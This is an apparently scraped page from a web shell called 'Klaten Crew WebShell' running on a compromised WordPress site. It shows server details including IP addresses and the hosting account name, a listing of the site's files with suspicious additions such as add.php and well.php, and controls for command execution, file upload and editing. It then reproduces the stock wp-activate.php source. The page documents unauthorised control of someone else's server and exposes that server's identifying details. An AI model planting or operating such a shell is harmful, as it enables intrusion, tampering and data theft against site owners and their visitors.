HanJsXploit Klaten Crew
Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
Apache
Server: 167.114.27.228
Your IP: 216.73.217.47
System Info
HOME
home
ipifapor
public_html
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-07-30 19:47:50
-
.tmb
Folder
-
0777
2026-07-24 20:42:11
.well-known
Folder
-
0755
2025-03-12 03:07:42
author
Folder
-
0755
2026-07-24 21:52:11
cgi-bin
Folder
-
0755
2024-05-20 23:48:36
contacto
Folder
-
0755
2026-07-24 21:50:56
directorio
Folder
-
0755
2026-07-24 21:42:35
doc
Folder
-
0755
2026-06-14 07:44:26
formacion
Folder
-
0755
2026-07-27 18:29:11
images
Folder
-
0755
2026-06-14 10:15:26
neftan
Folder
-
0755
2026-04-04 10:49:36
nosotros
Folder
-
0755
2026-07-24 21:47:28
organigrama
Folder
-
0755
2026-07-24 21:48:59
servicios
Folder
-
0755
2026-07-24 21:46:05
wp-admin
Folder
-
0755
2026-06-04 20:21:16
wp-content
Folder
-
0755
2026-07-30 19:45:39
wp-includes
Folder
-
0755
2026-07-17 19:28:51
.htaccess
File
812 B
0644
2026-07-24 10:05:59
add.php
File
13.68 KB
0644
2026-07-24 20:36:26
baner.jpg
File
164.45 KB
0644
2025-05-15 12:51:24
error_log
File
35.15 KB
0644
2026-07-30 01:25:09
google03cc0fa23fa7b025.html
File
53 B
0644
2026-07-24 20:44:50
index.php
File
405 B
0644
2020-02-06 11:33:12
license.txt
File
19.44 KB
0644
2026-01-01 05:07:30
material.pptx
File
1.24 MB
0644
2025-05-15 12:51:04
promayores
File
283.86 KB
0644
2026-06-14 07:36:20
readme.html
File
7.23 KB
0644
2026-07-17 19:28:51
well.php
File
7.21 KB
0644
2026-07-24 20:37:28
wp-activate.php
File
7.2 KB
0644
2026-02-17 22:05:44
wp-blog-header.php
File
510 B
0444
2026-07-27 18:29:15
wp-comments-post.php
File
2.27 KB
0644
2023-06-14 19:11:16
wp-config-sample.php
File
3.26 KB
0644
2025-08-12 19:47:32
wp-config.php
File
3.44 KB
0644
2025-03-07 15:08:27
wp-cron.php
File
5.49 KB
0644
2024-08-03 00:40:16
wp-links-opml.php
File
2.43 KB
0644
2025-04-30 17:52:30
wp-load.php
File
3.84 KB
0644
2024-03-11 15:05:16
wp-login.php
File
50.63 KB
0644
2026-03-01 03:57:46
wp-mail.php
File
8.52 KB
0644
2025-04-03 03:25:26
wp-settings.php
File
31.88 KB
0644
2026-05-08 20:59:44
wp-signup.php
File
33.81 KB
0644
2026-02-17 22:05:44
wp-trackback.php
File
5.09 KB
0644
2025-08-19 17:30:32
xmlrpc.php
File
3.13 KB
0644
2024-11-08 20:52:18
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Klaten Crew WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: wp-activate.php
<?php /** * Confirms that the activation key that is sent in an email after a user signs * up for a new site matches the key for that user and then displays confirmation. * * @package WordPress */ define( 'WP_INSTALLING', true ); /** Sets up the WordPress Environment. */ require __DIR__ . '/wp-load.php'; require __DIR__ . '/wp-blog-header.php'; if ( ! is_multisite() ) { wp_redirect( wp_registration_url() ); die(); } $valid_error_codes = array( 'already_active', 'blog_taken' ); list( $activate_path ) = explode( '?', wp_unslash( $_SERVER['REQUEST_URI'] ) ); $activate_cookie = 'wp-activate-' . COOKIEHASH; $key = ''; $result = null; if ( isset( $_GET['key'] ) && isset( $_POST['key'] ) && $_GET['key'] !== $_POST['key'] ) { wp_die( __( 'A key value mismatch has been detected. Please follow the link provided in your activation email.' ), __( 'An error occurred during the activation' ), 400 ); } elseif ( ! empty( $_GET['key'] ) ) { $key = sanitize_text_field( $_GET['key'] ); } elseif ( ! empty( $_POST['key'] ) ) { $key = sanitize_text_field( $_POST['key'] ); } if ( $key ) { $redirect_url = remove_query_arg( 'key' ); if ( remove_query_arg( false ) !== $redirect_url ) { setcookie( $activate_cookie, $key, 0, $activate_path, COOKIE_DOMAIN, is_ssl(), true ); wp_safe_redirect( $redirect_url ); exit; } else { $result = wpmu_activate_signup( $key ); } } if ( null === $result && isset( $_COOKIE[ $activate_cookie ] ) ) { $key = $_COOKIE[ $activate_cookie ]; $result = wpmu_activate_signup( $key ); setcookie( $activate_cookie, ' ', time() - YEAR_IN_SECONDS, $activate_path, COOKIE_DOMAIN, is_ssl(), true ); } if ( null === $result || ( is_wp_error( $result ) && 'invalid_key' === $result->get_error_code() ) ) { status_header( 404 ); } elseif ( is_wp_error( $result ) ) { $error_code = $result->get_error_code(); if ( ! in_array( $error_code, $valid_error_codes, true ) ) { status_header( 400 ); } } nocache_headers(); // Fix for page title. $wp_query->is_404 = false; /** * Fires before the Site Activation page is loaded. * * @since 3.0.0 */ do_action( 'activate_header' ); /** * Adds an action hook specific to this page. * * Fires on {@see 'wp_head'}. * * @since MU (3.0.0) */ function do_activate_header() { /** * Fires within the `<head>` section of the Site Activation page. * * Fires on the {@see 'wp_head'} action. * * @since 3.0.0 */ do_action( 'activate_wp_head' ); } add_action( 'wp_head', 'do_activate_header' ); /** * Loads styles specific to this page. * * @since MU (3.0.0) */ function wpmu_activate_stylesheet() { ?> <style> .wp-activate-container { width: 90%; margin: 0 auto; text-align: start; padding: 24px; box-sizing: border-box; } .wp-activate-container form { margin: 24px 0; } .wp-activate-container p { font-size: 18px; } #key, #submit { font-size: 24px; box-sizing: border-box; margin: 5px 0; } #key { width: 100%; direction: ltr; } #submit { width: auto; } span.h3 { font-weight: 600; } </style> <?php } add_action( 'wp_head', 'wpmu_activate_stylesheet' ); add_action( 'wp_head', 'wp_strict_cross_origin_referrer' ); add_filter( 'wp_robots', 'wp_robots_sensitive_page' ); get_header( 'wp-activate' ); $blog_details = get_site(); ?> <div id="signup-content" class="widecolumn"> <div class="wp-activate-container"> <?php if ( ! $key ) { ?> <h2><?php _e( 'Activation Key Required' ); ?></h2> <form name="activateform" id="activateform" method="post" action="<?php echo esc_url( network_site_url( $blog_details->path . 'wp-activate.php' ) ); ?>"> <p> <label for="key"><?php _e( 'Activation Key:' ); ?></label> <br /><input type="text" name="key" id="key" value="" size="50" autofocus="autofocus" /> </p> <p class="submit"> <input id="submit" type="submit" name="Submit" class="submit" value="<?php esc_attr_e( 'Activate' ); ?>" /> </p> </form> <?php } else { if ( is_wp_error( $result ) && in_array( $result->get_error_code(), $valid_error_codes, true ) ) { $signup = $result->get_error_data(); ?> <h2><?php _e( 'Your account is now active!' ); ?></h2> <?php echo '<p class="lead-in">'; if ( '' === $signup->domain . $signup->path ) { printf( /* translators: 1: Login URL, 2: Username, 3: User email address, 4: Lost password URL. */ __( 'Your account has been activated. You may now <a href="%1$s">log in</a> to the site using your chosen username of “%2$s”. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can <a href="%4$s">reset your password</a>.' ), esc_url( network_site_url( $blog_details->path . 'wp-login.php', 'login' ) ), esc_html( $signup->user_login ), esc_html( $signup->user_email ), esc_url( wp_lostpassword_url() ) ); } else { printf( /* translators: 1: Site URL, 2: Username, 3: User email address, 4: Lost password URL. */ __( 'Your site at %1$s is active. You may now log in to your site using your chosen username of “%2$s”. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can <a href="%4$s">reset your password</a>.' ), sprintf( '<a href="http://%1$s">%1$s</a>', esc_url( $signup->domain . $blog_details->path ) ), esc_html( $signup->user_login ), esc_html( $signup->user_email ), esc_url( wp_lostpassword_url() ) ); } echo '</p>'; } elseif ( null === $result || is_wp_error( $result ) ) { ?> <h2><?php _e( 'An error occurred during the activation' ); ?></h2> <?php if ( is_wp_error( $result ) ) : ?> <p><?php echo esc_html( $result->get_error_message() ); ?></p> <?php endif; ?> <?php } else { $url = isset( $result['blog_id'] ) ? esc_url( get_home_url( (int) $result['blog_id'] ) ) : ''; $user = get_userdata( (int) $result['user_id'] ); ?> <h2><?php _e( 'Your account is now active!' ); ?></h2> <div id="signup-welcome"> <p><span class="h3"><?php _e( 'Username:' ); ?></span> <?php echo esc_html( $user->user_login ); ?></p> <p><span class="h3"><?php _e( 'Password:' ); ?></span> <?php echo esc_html( $result['password'] ); ?></p> </div> <?php if ( $url && network_home_url( '', 'http' ) !== $url ) : switch_to_blog( (int) $result['blog_id'] ); $login_url = wp_login_url(); restore_current_blog(); ?> <p class="view"> <?php /* translators: 1: Site URL, 2: Login URL. */ printf( __( 'Your account is now activated. <a href="%1$s">View your site</a> or <a href="%2$s">Log in</a>' ), esc_url( $url ), esc_url( $login_url ) ); ?> </p> <?php else : ?> <p class="view"> <?php printf( /* translators: 1: Login URL, 2: Network home URL. */ __( 'Your account is now activated. <a href="%1$s">Log in</a> or go back to the <a href="%2$s">homepage</a>.' ), esc_url( network_site_url( $blog_details->path . 'wp-login.php', 'login' ) ), esc_url( network_home_url( $blog_details->path ) ) ); ?> </p> <?php endif; } } ?> </div> </div> <?php get_footer( 'wp-activate' );
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64 Software: Apache PHP Version: 8.3.31 Protocol: HTTP/1.1 Server IP: 167.114.27.228 Your IP: 216.73.217.47 Mail: ON Curl: ON Owner: ipifapor MySQL: ON Disabled Functions: All functions are accessible Auto Bypass: ENABLED